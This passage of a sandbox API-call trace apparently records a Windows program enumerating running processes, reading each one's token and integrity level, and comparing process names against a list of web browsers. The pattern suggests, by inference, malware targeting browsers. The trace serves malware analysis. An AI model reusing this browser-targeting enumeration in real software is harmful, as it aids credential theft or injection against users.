lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.943] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.943] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.943] GetLastError () returned 0x7a [0222.943] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.943] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.943] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.943] CloseHandle (hObject=0xb8) returned 1 [0222.944] CloseHandle (hObject=0xb4) returned 1 [0222.944] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0222.944] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0222.944] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0222.944] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0222.944] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0222.944] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0222.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0222.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0222.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0222.944] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.945] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.945] GetLastError () returned 0x7a [0222.945] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.945] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.945] CloseHandle (hObject=0xb8) returned 1 [0222.945] CloseHandle (hObject=0xb4) returned 1 [0222.945] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0222.946] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166568, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.946] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.946] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.946] GetLastError () returned 0x7a [0222.946] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.946] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.946] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.946] CloseHandle (hObject=0xb8) returned 1 [0222.946] CloseHandle (hObject=0xb4) returned 1 [0222.947] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0222.947] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0222.947] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0222.947] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0222.947] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0222.947] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0222.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0222.947] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.947] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.947] GetLastError () returned 0x7a [0222.947] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.948] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.948] CloseHandle (hObject=0xb8) returned 1 [0222.948] CloseHandle (hObject=0xb4) returned 1 [0222.948] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0222.948] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166a60, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.948] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.948] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.948] GetLastError () returned 0x7a [0222.949] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.949] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.949] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.949] CloseHandle (hObject=0xb8) returned 1 [0222.949] CloseHandle (hObject=0xb4) returned 1 [0222.949] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0222.949] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0222.949] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0222.949] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0222.949] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0222.950] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0222.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0222.950] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.950] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.950] GetLastError () returned 0x7a [0222.950] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.950] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.950] CloseHandle (hObject=0xb8) returned 1 [0222.950] CloseHandle (hObject=0xb4) returned 1 [0222.950] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0222.951] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166b78, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.951] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.951] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.951] GetLastError () returned 0x7a [0222.951] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.951] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.951] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.951] CloseHandle (hObject=0xb8) returned 1 [0222.952] CloseHandle (hObject=0xb4) returned 1 [0222.952] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0222.952] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0222.952] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0222.952] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0222.952] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0222.952] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0222.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0222.952] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.952] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.952] GetLastError () returned 0x7a [0222.953] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.953] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.953] CloseHandle (hObject=0xb8) returned 1 [0222.953] CloseHandle (hObject=0xb4) returned 1 [0222.953] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0222.953] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166c90, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.953] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.953] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.954] GetLastError () returned 0x7a [0222.954] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.954] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.954] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.954] CloseHandle (hObject=0xb8) returned 1 [0222.954] CloseHandle (hObject=0xb4) returned 1 [0222.954] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0222.954] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0222.954] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0222.955] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0222.955] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0222.955] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0222.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0222.955] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.955] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.955] GetLastError () returned 0x7a [0222.955] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.955] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.955] CloseHandle (hObject=0xb8) returned 1 [0222.955] CloseHandle (hObject=0xb4) returned 1 [0222.956] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0222.956] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166dd0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.956] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.956] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.956] GetLastError () returned 0x7a [0222.956] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.956] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.956] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.957] CloseHandle (hObject=0xb8) returned 1 [0222.957] CloseHandle (hObject=0xb4) returned 1 [0222.957] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0222.957] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0222.957] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0222.957] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0222.957] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0222.957] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0222.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0222.957] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.958] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.958] GetLastError () returned 0x7a [0222.958] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.958] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.958] CloseHandle (hObject=0xb8) returned 1 [0222.958] CloseHandle (hObject=0xb4) returned 1 [0222.958] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0222.958] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166ef0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.959] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.959] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.959] GetLastError () returned 0x7a [0222.959] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.959] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.959] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.959] CloseHandle (hObject=0xb8) returned 1 [0222.959] CloseHandle (hObject=0xb4) returned 1 [0222.959] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0222.960] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0222.960] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0222.960] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0222.960] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0222.960] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0222.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0222.960] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.960] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.960] GetLastError () returned 0x7a [0222.960] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.960] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.961] CloseHandle (hObject=0xb8) returned 1 [0222.961] CloseHandle (hObject=0xb4) returned 1 [0222.961] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0222.961] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167028, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.961] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.961] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.961] GetLastError () returned 0x7a [0222.961] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.962] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.962] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 